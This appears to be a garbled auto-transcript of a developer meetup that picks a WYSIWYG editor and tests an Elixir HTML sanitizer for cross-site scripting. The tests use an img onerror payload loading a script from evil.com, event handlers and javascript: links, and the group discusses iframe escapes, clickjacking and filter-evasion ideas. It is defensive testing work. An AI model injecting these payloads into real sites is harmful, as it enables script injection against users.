Uh,
And we're
welcome.
live.
Yeah, welcome to the Virtual Brown Bag, everyone. Um, just a reminder, Virtual Brown Bag is our weekly developer meeting, which is free for anyone to join, free for anyone to share. We are wow. Um, you know, we're basically here to talk about whatever's interesting to us, whatever's interesting to you. Um, the way it works is there's two links. There's a participant link, which is available on our Slack, and a viewer link, which is available to anyone, but anyone can join our participant link. You just have to join our Slack first. And as a just as a reminder, everything we share is auto posted on YouTube. Don't put anything on there that will get you in trouble, etc. Um, so that being said, how's everyone doing?
Good.
Yeah,
Yeah, staying busy.
yeah. Anybody have anything they want to share? No.
I have some questions. Has anyone used any like JavaScript WYSIWYG editors on the web page before, and do they have a favorite?
Other than DevTools?
No, not like dev tools. Like for I'm working on like a forum app essentially.
Mhm.
It has a lot more involved, but there's a CMS aspect to it. And so from my perspective, I know a text area that does Markdown is sufficient, but to embrace all user types, looking at more of a WYSIWYG type editor. Not even WYSIWYG would say it's not even that. It's a text editor essentially, but I guess it is a
Uh,
WYSIWYG. And so yeah, so I'm looking at like Tiny MCE, and then I think there's CK editor, and let me see. Let me pull a
between
couple of these
those
things.
You
two,
said for
tiny.
editing JavaScript?
No,
Not editing JavaScript.
Oh,
Like it's just
okay.
a tool. It's a JavaScript control essentially.
Gotcha.
So
Gotcha.
let me share my screen so that
yeah,
there's
rich text
context of
editor.
what we're doing.
Um, Tiny MC between those two, no question.
Okay, so there's CK editor, which some people use, and I've been trying to use, but uh, I downloaded and it had a bunch of different files, and I was trying to get it to work inside Phoenix with Brunch, and it wasn't super awesome. And then Tiny MC, which looked pretty good, but I'm just curious what people have used before they liked. Um,
It's been probably about 4 years for me since I've done this, but at the time, Tiny MC was, I mean, CK Editor was painful, and Tiny MC was less painful.
Yeah, I mean the
So
main thing also too is they're gonna be. I want like something that's easy to upload images and I guess linked to movies or movies.
Yeah. One of them costs a lot of money. I don't remember which one. To actually get file handling. I remember looking into that. Um,
Because even then, like I don't need them to handle the file. I just need the hooks because I'll just use File Picker
well,
here to manage
what
that.
do you mean about hooks? Just have people. Oh, I see.
Well, like if the tools, if they say, "Hey, I want to insert an image,"
Oh, I mean, you should definitely be able to put your own thing into there, your own
I guess
button.
drag and drop to somehow work in there.
Yeah.
Like, cause I was
Um,
playing around with, and to me, like Code Mirror is pretty cool.
Code
But
Mirror is good. It's very, very extensible, but that's not what you're looking for.
right, that's what I like because I can do a whole lot of things with it because I'll just do drag and drop and I'll have markdown and stuff. But I'm kind of thinking that the user base might be such that that having some of these things might make more sense for them.
What? You mean they're not going to be using Vim bindings for everything?
Yeah, and even then, like even though I'm tempted, like I would get rid of most of these things. Like all they need to do is like a form thing. They don't need a bunch of bold and
Yeah.
italics and stuff. Like just type the content, and then
So
it needs to link images and videos.
I think it's also worth asking, what does that do for cross-site scripting? And that because a lot of these are one giant cross-site scripting vector. You kind of have
Okay.
to be concerned about. Um,
Yeah, because I don't want that.
Yeah, to the point that I would just freaking avoid doing this if at all possible. But if it's not possible, you have to look into it. You have to spend time looking into it because it's all, you know, there's a lot of stuff you can do to cross-site scripting inject this shit. Like someone puts a script inside your image tag or something like that, or an object tag in there. Like, does it support it? Does it not support it? What happens if they on the backend path on the backend route? You're going to have to somehow sanitize it so only the elements that you actually want them to be able to submit are available. Because otherwise, they could pop open DevTools and submit whatever they want. So,
What do you mean by that?
okay.
Like put a script or click handler,
So,
mouse over handler on in the HTML element, and
let's say the kind of the quintessential way of doing. Remember when I was trying to show scripts, process scripting, and just the basic thing, and it just wasn't quite working. Um, so the reason why is this is a rule in most modern browsers. If you enter HTML a script tag into the page, it's not going to work. It just won't run.
Right.
So what cross-site scripting people do to get around that is you put an image tag in there and have it point to something that doesn't exist, and put an on-error handler in it and put JavaScript in there that creates your script tags. Or you could put an onloaded in there and point in something that does exist. So let's say TinyMC, if they try to do that, it strips it out. Great. But on the back end, you still need to validate for that condition because they could just open up DevTools and hit that route directly and put an image with an on-error script tag in there. And on the back end, you're not stripping out all HTML or something. You can't be using text content on the front end when you display it because you want to allow some HTML, but you've got to find an OWASP compatible library for your back end to scrape that out, and probably another one for the front end to scrape that out.
I'm looking to see what type of tool. So here I'm thinking about the backend because it's Elixir and Phoenix, and I know I already had this installed because I was using it for something else. So what does this guy do? He looks like he strips the tags, but what else?
Sure, but you don't want to strip tags.
I don't want to strip the tags. In my scenario, what I'm using it for, I did want to strip the tags, because I wanted to have on the home page it can show like latest entries, and then for that scenario, I didn't want it to be decorated. Plain text is fine.
So even if someone did bold or put an image or something in there?
Well, it says, doesn't it, that you can let certain HTML elements, right? There you go.
Yeah, see, less certain basic HTML elements. It looked like they put a script tag and it cleared it. So I guess I can experiment with this.
Hold on. But that just means, okay, so now you're saying let's let all image tags through because you have images. But images are the attack vector.
Well, you know what?
You have to control attributes.
You know what? Let's pull this thing up and let's do some testing on it and see. Let's see, George, see if you can hack SOAR it.
Sure.
Crazy.
In Elixir?
Heck yeah, we'll do it in Elixir. Let me.
See.
Nice.
Yeah, let me first get this thing set up.
Yeah, while John is doing that, does anyone else have anything they want to share? All right. All right, JB, get it set up.
Give me a second. That would be.
Yeah, so that's like honestly to me, kind of the sane way of doing a lot of this stuff, especially if you don't need anything fancy, would be to find a rich editor that when it saves stuff, it saves it as Markdown. So that way, on the server, you can strip out anything that resembles HTML at all, and then on the client, you take it, strip out any HTML at all, and pass it into the Markdown parser, which generates whole new HTML, and that's relatively safe. But
All right.
Um,
So, right now he does. So let's take a look at. Look at create post, and so under my web, under actions, we have create post. Um, all right. So here I'm creating the from Markdown. So Earmark is a library for Elixir that takes the content that's Markdown and turns into HTML content. So if I was doing this as an editor, what George is saying and what would happen is that this content I'm getting in wouldn't be Markdown. It would be straight HTML content. So let's actually just create a test here that we'll just call we'll just test this out. Sanitizer test 2. We'll use XUnit because XUnit is awesome. We'll just make up different scenarios as we're going. Oops. All right, so what is our, I'm just going to call this input. We'll have input. So if we have hello world, and let's look at this guy's code, HTML sanitizer, we can say strip tags or basic HTML. So we're going to look at the basic HTML. Output equals input. Base, what we see here is that output should equal, that's what would be expected. We have nothing nasty. We would expect that to work.
Hey guys. Can y'all hear me, by the way?
Yeah. You look relaxed, George.
Yeah. I'm actually not sitting in the beanbag anymore. I'm just leaning against it.
There we go.
All
right, so scenario 2 is what they show the example is that they put a script tag here, and it's supposed to get rid of it. Okay. All right, so now George, you're up. What do we want to do? You said we want to do an image tag.
Yeah, let's do an image tag because you want to allow images.
And we'll just keep the script there just because we want to mess with it. And we'll do an image, and we don't care what the source is, so we'll just do an image tag like that.
No, do it with a source.
Source equals
food.png, right?
And we need to work in Elixir. Food.png. All right. So what would we see? Left-hand side. Oh, they added quotes, so it'd really be. And that's probably more correct anyway. You know what? There's Elixir. There's a way of creating Elixir strings like Ruby where you don't use the quotes. Let me look it up. I forgot what it is. It's one of those things you never use it until you need it, and then you.
Yeah.
That's awesome. Come on, Elixir Lang. No, that's not here. I'll put it over here so it's not boring. Let's look at Elixir and see if they have it under the
so what are you
documentation. Way to make a string without quotes. There's a way of doing it.
Can you just use single quote for the outer string?
No, because those are two different things. One is a char list and one is a string. And those are different things in Elixirs. Okay, well maybe we'll just old school it and do the slashes. We're big boys. We've been our big boy pants, and we can.
There's a sigil S to make it more convenient. There's something about sigils that you can do. Ugh. Oh boy, you could do : S and then in parentheses, and then in parentheses pass it as a symbol. Here, try that.
There we go.
Try that.
That's it. That's what I'm looking for. Yeah, so we can do.
Yeah, which is nice. So what? Oh, also there's multi-line strings.
Right. This is exactly what I was looking for. And where's the multi-line one? Is that for there? Oh, it's just 3 quotes.
Triple
Right.
quote.
Okay. This should.
So what are sigils in Elixir exactly?
Magic. I don't know.
Okay.
Never heard the term sigil to that. I've seen it, but I didn't know the term
Okay.
for it.
Let's add an on error attribute to there to
Okay.
the input.
So our scenario 4, we want to add an on error
Equals document.create element script or something like that. Element script. I don't know. That's probably good enough. Or just put in there console.log hack. Or do you want to do the whole thing?
Let's just put here.
Let's do
Oh,
the whole-
inside
let's do-
here.
Let's do the whole thing. All right. So document.create element script gets assigned to variable s.
Okay.
Yeah. Let's do the whole thing. Then so after the create element script, s.src equals evil.com/xss.js.
We'll just food.js.
Yeah. Put an HTTP in front of that, obviously, or a / or something. Yeah, actually a / would be evil better, because a / means if it's HTTPS, use HTTPS. If not, otherwise. And then you would do, and then semicolon, and then document.body.append child s. .body.append child s.
.append child s.
Yep, close string.
See, come back here. Okay, and we'll make this source that and that. It's gonna. I'm pretty sure the highlight's weird because it doesn't know how to handle.
Yeah,
the sigil. It's like what?
All right.
The semicolon is going. This is we'll see what happens though. Maybe Elixir is problem with Elixir. Maybe Elixir is gonna be like, what the? Yeah. All right. Well, let's just build this thing then. Input. We'll start off with.
Wait. So what is Elixir complaining about?
Missing terminator for string starting at line 29. So like it didn't get the parentheses and stuff. Like this semicolon, I think is messing it up. Just break it down multiple lines anyway, so that we can read it.
Yeah, do a multi-line string. No, yeah.
Let's give that a shot. So what we need is a sigil, right? And then
No. It's just triple quotes. Just triple quotes, no sigil.
Are you sure? I thought I saw a sigil.
According to the Stack Overflow I pulled up for like a second.
Let's see this. All right, there we go. That looks, yeah, now we can be super awesome and see what's going on. See our evilness.
Mm-hmm.
Okay, wait. So now I need to know why
So the output here, what they added, the left-hand side has a in, so it's just.
Yep.
What was the difference between the two? Oh, parentheses, because
there's a parens in there. Yep. Okay. That looks good. So let's strip that out.
Hey, there we go.
All right. Let's add a on mouse over to the H1.
Okay.
So we don't need the IMG anymore. Just add an on mouse over.
Oh, we'll just keep on. We'll just keep on building up the evilness.
Instead of the on mouse over, put that. So.
All our evil.
Mm-hmm.
wonder if this will work inside. You'd hope so.
This is, by the way, not at all me like trying to figure out like this is not at all me following any actual checklist. Like anyone that actually
Okay.
does this stuff is way better at it. This is just the basics.
Huh?
Yeah.
Seems pretty good. Let's do a little dive into the dude's code.
Yep. We could do that. Sure.
All right, so sanitizer. We got a scrubber that we're calling scrub stuff on. So let's take a look here. Scrubber, scrub. Okay, before scrub, replace this regular expression, which is super cool and awesome. I'm not gonna be able to figure that out. Actually, let's see if we can figure this out. So // here. What I've been doing is I guess reg test regular expression. There's there we go. Regex 101. Have you ever seen this? I bet you have.
Nope. But
It's pretty cool. So like you put your regular expression.
Reg. Oh,
and-
I like Reg Expert, but yeah, that's cool.
So it captures the character there literally and matches the character between limited times. So
Oh, so should we try putting some brackets inside of our script tag and see if that breaks it? Inside of our
yeah, I just want to
attributes.
see if this thing matches. Not going to match that. So it was looking for that and then any spaces between there. There we go. It's just getting rid of spaces between tags. That's what he's doing.
Oh, that's all that is? No. Okay.
Yeah, so this is a pre-scrub. We're getting rid of spaces between tabs. Now we're going to parse. So let's go to the parser. And inside here, I guess here we have, they're adding their own little root node. And then they stick the HTML in there. And Mochi Web is apparently an Erlang library. Let's take a look at that.
Ooh, okay.
It's Erlang for building lightweight HTTP servers.
Well, why do we need that?
We're calling something on it. What are we calling? Parse. So maybe to parse I guess it parses the HTML string into like a tree, I guess, or a list.
Okay.
Yeah, and then he's going through, and so the head is of the parse list, and he's going to go through each of the items.
Okay, so just for the benefit of everyone, so that's object structuring. So it's returning 3 items basically.
Right.
And one of them is going into a variable called myRootNode. Another one is you're just ignoring.
I'm assuming that's the at. So my guess here is that we'll take a look at this to confirm it, but my guess is it's going to parse HTML. It gives you as the first argument the parent node. That's why he made it up. He's like, I don't care about it, so I'm going to make it up. Then the second one, I bet, is a list of the attributes on that node. Again, it's going to be empty because he just put it in there. He doesn't care. And meanwhile, parse, it looks like, is a list of some sort of what the HTML does. So let's take a look and see if we can find and read Erlang, because yeah, that's easy to do. Oh yeah, we're gonna totally find this here. HTML.
Yeah, I'm not gonna.
If we look here, parse. We're exporting the function parse. It's the arity of 1. If we look here, input, we have parse tokens, and yeah.
This
so
is back from the day where people put giant copyrights in all their files. Because your source control totally doesn't do that.
So we have the doc, transfer the output of docs into an HTML tree, and they define HTML tree somewhere. But yeah, we get this tree dot, which I don't know what that syntax means.
I don't either.
Yeah, maybe it's a type or whatever. But anyway, I'm going to go with my understanding of what this is. based on what this code is and what I've been seeing here, and what sort of makes intuitive sense to me. So if, and what this is checking saying here is, if length of parse is 1, then just return the first element. Otherwise, return the array or the list. So that would be, hey, if we had, there, then my length of x is 1, and if I do the head of x, I would get that.
Mm-hmm.
So that's what parse is doing. And when we go back here to Scrubber, so we got rid of the blanks between tabs, we parsed it. Now we're going to traverse this.
Yeah, it's basically some elements in the structure that are passed to it, right? Okay.
Now the traverser is going to be like, all right, so this is where Elixir shines. If it's empty, we're done. Return empty. Otherwise, we're going to go through head and tail, traverse this. I love his debug code's totally here. Traverse it, collapse list. I want to see, what I'm looking for is when we get through each of the children.
Yeah, well there's also that Scrubber module parameter. What is that?
Oh, interesting. So here he doesn't care about it. Here he does.
Yeah, so it seems like the Scrubber module should be passed in.
He passes in a Scrubber module.
And where does it
pass in the scrub? And that is done. Where do
that
we
makes
get?
sense. Okay, Traverser is just going through each node, and whatever Scrubber module is what's running on it. It's a visitor pattern.
Right. And here he goes. Here's his different Scrubber modules. So no scrub, basic HTML, HTML5, and strip tags.
Okay.
We're looking at basic HTML.
Right.
So let's take a look at that. See if there's a scrubber. We can Scrubber, basic HTML. Okay. So basically just whitelists certain things. That's what I was looking for. It's like
with these attributes, Okay.
These are the only thing you can put past here. Everything else is gone.
Huh. Okay. So that's interesting. So everything else is going to be eliminated. So we've got that, and so we left href or anchors and the title. The href for anchors could potentially be a problem. Let's try this, actually. Can you create a page, or actually just modify a page somewhere, and add an anchor element with an href that has a JavaScript colon console.log?
Okay. You want to try it on GitHub's?
Nah, GitHub's all weird, but yeah, sure. Find a place where you can add an anchor element.
Let's go to the awesome virtual brown bag site.
Yeah. Okay.
We want on here.
Yeah, find an anchor element. Probably that Slack.dev virtual brown bag thing.
Okay, there we go.
Okay,
right.
So let's edit as HTML, or yeah. So change the href to JavaScript colon console.log foo something. Yeah.
Okay.
All right. Now click it and take a look at.
Oh wait, let's see. I needed. Let me do.
Yeah, it's a little too small to actually see what you're doing.
Yeah, let me.
It's fine.
Bigger and let everybody see the awesomeness.
Yeah.
There we go.
Okay.
Seem pretty good.
Now bring out the console and click it up.
Uh-oh.
So, by allowing href, they could put malicious JavaScript in the href, and then someone clicks it. They're being cross-site scripting injecting.
All right. So let's take a look. So scenario 6, we have our evil, and what we want to do is we want to say, hey, we're going to have a link, and we're going to totally stick our evil. We're going to put. We have to say JavaScript.
Colon evil. Yeah, let's do all the evil stuff. Now that still won't fire until someone clicks it, but that's probably good enough.
happens here. Oh, so it got stripped out. Let's see why it got stripped out.
Yeah. Right.
Okay. Click me for good times. I am calling basic HTML, so we know that there. So let's take a look and see what we can find here. We do. Oh, valid schemes. Look at this.
Oh, well, okay. So that's
valid schemes, HTTP and HTTPS.
okay. So that would so then that means JavaScript.
JavaScript is not.
Okay. Huh. All right. That's pretty good.
Same thing there.
Yeah, that's a difficult one to come up. So I don't have anything off the top of my head, but
well, it seems pretty good. I have it's good enough for government work that let's sanitize that.
Well, what other elements do we get? Do we get IMG, which allows SRC? Again, valid schemes, which it
and
will
this
allow.
Also here it doesn't allow video embeds, and my requirements basically are to allow
or
that.
data URI. It won't allow that.
Right. I'd be kind of curious, like, so if you want users
make the file. Can you make that text a little larger?
Yeah. So, if you're gonna allow users to have videos and upload videos, I mean, like, so this site is gonna be for gaming stuff. So, I mean, they can always link to YouTube or something like that, but
I think videos work with. So how do you embed just go to a YouTube video and look up how to embed it. I think it's with objects.
Yeah, let me.
Or
I'll
you
go
could do it with a
to the other
video
page, get one of our virtual BrownBag videos, and we'll take a look at it. We'll embed the one that's going on right now. So no, more actions, share. I have this on the other screen. I just want to.
Yeah. Okay.
Do it. All right. So this is what it wants to put in.
Where's that? Where do we have it? Oh, iframe. Yep.
Yeah.
So an iframe is going to be a problem, right?
Right.
So iframe is not going to do it. It's not going to allow object. It's not going to go allow so on. But yeah, iframe is a common way of doing this. That's the one that I think is easiest and most supported by browsers. So if you want to allow that, you'll have to whitelist iframes, which means
that opens up a whole lot of nasty, right? Because if you have iframes.
Yeah, an iframe can actually do window.parent.content or something like that, and start working on that. There are ways around it. It's actually one of the things where it was kind of an arm race of like figuring out how to prevent it and figuring out how to beat those preventions. Like if you Google get parent content from iframes, it gets wild. Like the different things that you can do and that you can do to stomp it out.
Where would you say?
Yeah, getting parent documents from I don't know. This is something about 2 years ago I had to do. But and then if you Google like stop iframe from getting parent document.
Loading.
No, from getting parent document. It's one of those things where it's like you just have to learn about a whole range of techniques.
Yeah.
Yeah. Iframes are a big thing. So that's why, I mean, like, you could try to only allow like HTML5 videos or something like that.
There's Qt editor. He's talking about it. So let's just see what does Qt editor even do. Qt soft.
Hey, does anyone have anything else they want to share? We can keep going.
I'm getting a lot out of it, so it's good for me because I still don't like the fact that I have to use an editor.
Well, no, and then there's the other question of, well, you have to like take a look at what it actually generates, and if what it generates will pass muster with this plugin, but it probably will be fine.
Right. But from your point of view, between CK Editor and Tiny MCE, you like Tiny MCE?
Yeah. Again, it's been like 4 years since I've had to care, but
Yeah.
since this is talking about ASP.NET, I'll note .NET Core came out yesterday, and ASP.NET Core and Entity Framework 7, which is renamed EF Core. So I think that's worth noting because that's kind of awesome. And they have a really they have a read the docs actually documentation, which I think we can all agree is great.
So they were all released 1.0.
Yeah. But I mean, but they have actual good docs,
Huh.
which is awesome. Like it's not MSDN.
Well, especially
Here,
for
I'll
1.0 to have good docs come out with it is.
or to have anything from Microsoft to not be on MSDN and unreadable, like what I just
Unheard
put in
of number one and awesome number two.
Yeah. Well, here, click the thing I just put in chat.
Oh, okay. Let me.
I don't want to get you an entirely different tangent. I just want to show this real quick.
No, it's good. Let me get my little page up. It's good. Bam.
Like, right? That is documentation for a .NET library. How exciting is that?
There we go.
This is actual docs, not just here's a class reference. Yeah. This I'm super excited about all that. Also, if you look at EF7, they're saying it's a port. You should consider it a port, not an upgrade, because there's a lot of features that aren't available in the new Entity Framework yet. Interesting enough, that list of features almost entirely corresponds with a list of features I believe to be evil in Entity Framework and avoid at all costs. So, feeling pretty good there. It doesn't support implicit many-to-many relationships, so yay.
Maybe we can hack around on these next week.
Yeah, maybe I don't know that I'll have time to take a look at it, but if anyone else wants to and get it loaded up, or maybe I'll have time. I don't know.
So I didn't know, when did the string interpolation come in, right?
Oh yeah, that was C#6, and I just found out actually, it actually has some structure to it. So what that is, it's castable to a string, but it's not actually a string type. It's something called a formatted string, which actually has a bit of an API behind it. Like you could call you could take a formatted string class and do .get arguments, and it will get you the arguments that are passed into it.
Oh, interesting.
Yeah, so that's kind of interesting. Like I just learned that yesterday.
Yeah. I was thinking the numbers for ASP.NET stuff look pretty good from performance stuff. I haven't dived into it, but the cursory stuff is pretty interesting.
Yeah, they were claiming what, like 9 times faster than Node or 9,000, one of those.
Yeah. It was really high. It was significant at the point that I was like, wow, that's pretty cool.
I mean, yeah, but I mean, it's the same thing as any one of those things. They write a bare bones perf test, and I mean, the Microsoft guys are actually usually pretty honest about it, but it's none of no one writes perf tests against actual scenarios that anyone runs into ever. So
right, yeah, it's sort of like thing where mine I like with Elixir is that it's not they always compare it to all the other fat like Node or Go or something like that, and I'm like, I don't care about that. It's to comparison against Rails and Ruby is what I care about, because it's just the point where it's like,
yeah, but that's a dumb comparison.
yeah, well, that's why. Well, it is if you're a Ruby developer and you're like, I love Rails, but I don't like the performance. It's like, come join us in Elixir and Phoenix Land. Yes, there's vast differences between the two, but there's also a lot of familiarity, and then suddenly things that should be your like the restriction on performance and your bottlenecks are again like
Yeah.
database access and like some things with your code, and it's not Ruby and Rails is just slow.
Yeah, I reread that Zed Shaw post. Rails is a ghetto. Well, when was it? Like me, I think maybe late last week. And he was talking about how at one point, Rails would restart 400 times a day, like DHH's version of Rails. It's just,
There we go.
yeah, yeah. If anyone doesn't know about this post, it's an insane, profanity-laced, and super catty and interesting post about why Rails is dumb from Zed Shaw, who is honestly like super awesome. He wrote Mongrel on Ruby and the whole Learn X the Hard Way series of books on programming, which are really, really good. He did those. And apparently he was kind of like drummed out of the Ruby community and almost homeless for a while and couldn't get a job because he was like, I don't know. He explains it in there. I'm sure also he's a fairly unpleasant person, but
I'm pretty sure there's
Pretty
not a
awesome.
blacklist of people.
It's part of being awesome, right?
he is awesome though. I mean, he does in this post threaten to fight anyone. Okay. But this is
This guy
this
has
is-
strong opinions, and I can respect strong opinions.
Oh yeah. No, I mean like, and his body of work is really impressive and really good, and I've seen his talks, and I incredibly enjoy him. I really enjoy his writing. Yeah, like I think we would get along famously. He's probably a giant ass.
yeah. I always preface the comments that you share, George. Sometimes I'm like, I did hear this from George.
Yeah.
He doesn't mean to be a troll, but I think sometimes he just trolls me because he's more knowledgeable in the subject than I am.
All right. Did we want to get back to what we were talking about before? It's 7 different deviations.
Yeah, we got about 15 left. So.
Yeah.
Okay, what were we talking about? Oh, the editor seemed to be good. I'll play around with it.
Yeah. So that's interesting. So I think what's key there is that it's using that Mochi library to do HTML parsing. So realistically, if we were to find a weakness in it, it would be a weakness in the Mochi library.
Well, the Mochi library, all the Mochi library is doing is taking the string HTML and returning it into a data structure that can be traversed using the pattern.
But HTML is tricky as hell, and if you could if you can get the parsing to parse in an unusual way, because I'm sure that's not the only thing it's doing. I'm sure what it's also doing is serializing it back to a string. So if you can get either, you would attack it at one of those two levels. Either the parsing and then the stringification would follow from that, or attack the stringification directly.
Right. So I'm checking to see when we convert it together. So
this is interesting to look at the Elixir code this way though.
Yeah, I found the Elixir code. I normally didn't dive into the code, but Elixir, I've found myself diving more and more into it because you're used to looking at it anyway in terms of the documentation to learn how to do something is in the code.
So what's a tilde-r sigil?
Regular expression.
What are sigils? They're just symbol and delimiter. And then
I don't know. That's what I find out. But I know this is a regular expression because I've been dealing with regular expressions on stuff. Got a lot better at it using the advent of code. You end up sort of having to use regular expressions. I have a couple advent of code problems where my answer is wrong, but like I can't figure out. Like I look at the code, and so in both of them are wrong, and they sort of cover similar spaces where they're both looping through, like parsing strings in similar ways. And so I'm like, I'm wondering if it's something the way that Elixir parses their strings, because otherwise it looked right, and I would have to look up exactly which one it is. But anyway,
So I'm not sure I understand this. It's saying regex of the root node itself. What the heck does that mean?
it's getting rid of that.
It's getting rid of what?
The wrapper, the root node wrapper.
Oh, okay, I see.
So see, that's there with the slash in there. This is, I was thinking this is Elixir, but it's not. This is a regular expression thing. What does that mean in regular expression land?
Beginning of string.
Okay, beginning of string. Okay. Yeah, it's just getting rid of that root node.
Okay, I see. So it's getting.
And then this HTML sanitize. Yeah, 'cause that's weird because that's what the root node is. And maybe there's a weird
Right,
scenario where it's still there.
That means you could, if you drop HTML sanitize into there, it could potentially. Well, no. I mean, all that would do is it would break if some user dropped an HTML sanitize in there. It just their rendering would break, which who cares? Okay, so do that, and then I guess it's the line 25, which turns it to a string, actually.
Right.
So.
Yeah. So I guess that's right. So we're getting the using Mochi Web, and we're getting it in this data structure, and then we're parsing that data structure to another format. Then we're passing it to Mochi Web to give us HTML.
Okay. Yeah. Cool.
Pretty neato.
Oh, I want this to talk about Google Contributor. I just signed up for it, which was really interesting. Has anyone else heard of this?
So if I Google contributors, and
Yeah, I think that's what it is.
so what's that say?
Yeah, this is it. So basically, you pay money directly to Google, and then they stop showing you as much ads. And then as you visit web pages that would have gotten ad revenue from you visiting them, it just pays them out of the money that you paid to Google.
Okay.
It's a pretty neat idea. So like when a lot of times when I visit, I signed up for it yesterday. So now when I visit sites, I see thank you for being a contributor, where an ad would be, which is nice. So I'm still supporting the websites that
Right.
I like. And not subjecting myself to as many ads. Now it is $7 a month here with the first month free. I do have a coworker that's I'm still in the free trial. I have a coworker that says you can actually move it, make it less money after you move past the free trial. You actually can determine up to $20 how much you want to pay a month, and it's taking out of that. So basically, up until that limit is reached, any Google ads that it can remove, it will remove. And after that, you're going to be seeing the ads. So pretty neat. I kind of like it. And also, technically kind of cool. Because that means, we already knew that ads are tailored to people, but, they're really now taking your account configurations into account as they're
Obviously works. Does it work? It works probably in Chrome, but does it work in the other browsers too?
It should. I mean, it's tracking you. Yeah, they track you
cookies
anywhere.
or whatever.
Yeah, I mean, the way it normally works, right, is
Right.
if you search for something, you're logged into Chrome, right? So it knows you're searching it via Google. You're logged into Google. So it knows what page you went to, and then it's still your browser that's hitting the Google APIs thing. So yeah, it knows who you are.
Wow. Two things. One, it's pretty amazing what kind of monopoly Google has, right? It's like a testament that they can literally create a kind of ad blocker just through a cookie mechanism, right? Like
Well,
that's power. That is.
it's not through a cookie man. It's the ad blockers through their regular ad serving mechanism because ads are tailored to you.
It's through their ad serving mechanism, not
Yeah.
a cookie, a session or whatever, whichever way they're keeping track. They're basically
yeah.
being able to inform.
Yeah, I mean that's just the way their ads work, right? So what happens is when you go to a website, there's a request to whatever the Google Ads API is, and what gets sent to there is whatever cookies you have against the Google Ads API. And those cookies have probably got placed whenever you signed into Google, or whenever you really used Google or something like that, because it's all for the same domain or a related series of domains. But I mean, they could. I mean, people seem to be under the impression that cookies are like magic or something. There's nothing different or magic about cookies in any way. You could do the exact same thing with URLs or anything. It's just a bigger hassle for everyone involved. Yeah. But yeah, Google. But I kind of like this that this is a thing that exists.
I like it as an option. I don't necessarily
Yeah.
be the person in, but I think it's a legitimate option.
Yeah, I'm trying it right now. I mean, I started noticing it right away. It's pretty neat. Yeah. All right, that's what I want.
Yeah, you're done. You're tapped out.
I'm done.
You've tried hacking HTML sanitizer, and we could not. So that's pretty legit.
Yeah, hold on. Well, actually, because we just had a cross-site scripting conversation at work, because someone was apparently OWASP recommends HTML escaping any slashes, which seems strange. I mean, like, yes, without slashes you can't put together a URL, but that seems like a complete paranoia because by the time you get to the slashes part of it, you're already in a JavaScript context, where you're screwed. So we're just bandying around ideas of how to get a slash once you're in a JavaScript context, how you can get a slash without actually using a slash.
Can you do like a character code, like number?
Character codes is one. Create a regex that matches everything, that discards everything except for a slash, and you could search the page. You could grab the current URL and parse slashes out of that. Let's see, what other ones that I come up with? If you could, so if you have a mechanism like create a image on the page and then you could check whether it loads successfully or not by using on-error onloaded or something like that. So you could randomly generate characters and put them into positions where a slash would go in an IMG tag, and once it loads accurately, then you know that you have a slash. So I was just sitting there like coming up with like ways to get slashes off the top of my head without doing it. But it's a cool like mental exercise and kind of worth worth going through because that's how people hack, and it's useful to be able to think like them.
Think like the evil.
Yeah.
Well, I mean, I appreciate it now. I can play. I guess I'll play with the CK editor, and now since I know the sanitize, I can at least sanitize the input.
Yeah.
Because I wouldn't have thought about it that way, and it's completely right. Because I don't trust anybody, but I didn't think about the markdown. I knew, even though the markdown, I was like, I guess you could put HTML tag in the markdown. It depends on.
Well, yeah, but you could say I'm using a markdown that doesn't allow HTML tags as well.
Right. And I guess the iframes. It looks like there's a scrubber that does HTML5.
Yeah.
It allowed a lot more things.
I wonder if it'll allow SVG.
This one says it allows the disability stuff, and then here, let's see if they have SVG.
Ooh, iframes allows. Allows
iframes.
Questionable. I would say that's.
I think HTML5 is sort of used at your own risk situation.
Yeah. SVG gets interesting because you could do an SVG, and inside of an SVG, you can do embedded HTML.
You can do an object, so there you go.
Yeah. So Yeah, this is very. There's a lot more attack vectors here. A lot
Right.
more. An iframe, SRC valid schemas, sure, but then inside of the iframe, all sorts of stuff.
Yeah.
And I guess it's like, is that say it's implicitly putting Sandbox seamless with height? No, I guess
I'm guessing that's what the allowable allow tagged with these attributes. So those are the allowable attributes you can put on there.
Hmm. Yeah, it probably would be possible to jump out of the iframe and get it.
Yeah. I think I would start. I think of the first go for videos. I was kind of thinking making certain posts special, and I guess a video post you have the content, but then you can also have like a video URL you can put into it, and then I can handle that specific scenario. I don't know what I would do exactly with it, but could figure it out.
Hmm.
Like what would so if I wanted to put a video? I don't know.
Well, there's the video tag, but I'm not sure how it works exactly.
Yeah. I guess I'll do more research.
Yeah, I haven't had to do enough of it, but yeah, the iframe stuff is dangerous. So if you can find a way of doing it that's not an iframe, I would do that.
Right. And I was kind of thinking too, even if you could, like if I can get the, hold on, let me pull up, see if I can pull up a YouTube thing. If I could auto-generate the iframe myself from a video input that I maybe parse in some sort of fancy way. So let me see, so if I share and embed, see if they gave me this URL, I could get the video and I could put that in there.
Yeah, I think there's a way to video thumbnail. I think there's a way to parse. YouTube has to expose like an HTML5 video link. It's got to be available. Just probably you have to like look it up or something.
Yeah, I guess I'll.
It's
Oh,
a
here's
sort
this
of
show
thing.
more. Let's see what happens. Let's just show more. Preview. Oh no, it's just letting you adjust different things.
Yeah, the other thing, like, because even if you do a lot of good security with an iframe, the other thing that I'd be worried about is clickjacking with an iframe, which as long as the person who positions the iframe can do stuff like control opacity of the iframe and the position, what they could do is position it, transparentize the iframe, point at like your Amazon or your bank, which will load up with your cookies, and then position it over buttons that you are likely to click. So when you think you're clicking those buttons, you're actually clicking buttons on Amazon. And that's how clickjacking works.
Yeah. Okay. I think in this scenario they wouldn't that would be my goal. Would be that they wouldn't create the iframe. They wouldn't be.
Yeah.
I create it.
Yeah, but they could still put in an iframe. I mean, in DevTools, like unless you're checking on the server, what exactly is in there.
That's worth the experiment. I can get the stuff set up, and then we can do another review. This is how I did it, and we can be like, how can we mess this up?
Okay.
All right. Well, this is good. I got a lot out of it. We learned about HTML sanitization. Got an editor choice I'm gonna play around with because I wasn't very happy with the other one. And we discussed embedding videos. And showed a little bit of Elixir, looked at some Erlang code as well, learned about documentation from .NET. They're finally getting it awesome and right. Learned about the formatted string object and that you actually get properties from it. And I didn't even know you had string interpolation in C#.
Yeah.
It doesn't surprise me that it's there now. I'd never seen it before. So, and We missed out on George talking to us about how much he loves WPF, so we'll just save that for another conversation.
It's fine. It's all fine. It's almost over. I'm almost on to a new project.
All right, well, that's it for today, guys.
All right.
Thanks for joining.
Thank you. All right.
All right, guys. See ya.
Bye.
Bye.